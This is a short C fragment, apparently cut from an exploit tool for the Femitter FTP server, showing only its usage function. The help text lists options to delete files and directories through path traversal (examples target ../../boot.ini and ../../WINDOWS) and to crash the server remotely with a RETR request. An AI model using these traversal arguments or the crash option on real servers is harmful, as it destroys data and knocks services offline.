
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int exit (int ) ;
 int fprintf (int ,char*,...) ;
 int stderr ;
 int stdout ;

int syntax(char *file)
 {
 fprintf(stderr,"\nFemitter Server FTP 1.x Multiple Vulnerability\n");
 fprintf(stderr,"-----------------------------------------------------\n");
 fprintf(stderr,"=>Syntax  : <%s> <ip> <port> <login> <passwd> <option> <argument_option>\n\n",file);
 fprintf(stdout,"=>Option  : -df\t\tDelet File\n");
 fprintf(stdout,"            -cd\t\tCreat Directory\n");
 fprintf(stdout,"            -dd\t\tDelet Directory\n");
 fprintf(stdout,"            -crash\tRemote Crash with Request RETR\n\n");
 fprintf(stdout,"=>Exemple : %s 127.0.0.1 21 login1 passwd2 -df ../../boot.ini\n", file);
 fprintf(stdout,"          : %s 127.0.0.1 21 login1 passwd2 -cd ../../poc\n", file);
 fprintf(stdout,"          : %s 127.0.0.1 21 login1 passwd2 -dd ../../WINDOWS\n\n", file);
 fprintf(stdout,"=>Crash   : %s 127.0.0.1 21 anonymous aaaa -crash-ftp\n\n", file);
 exit(0);
 }
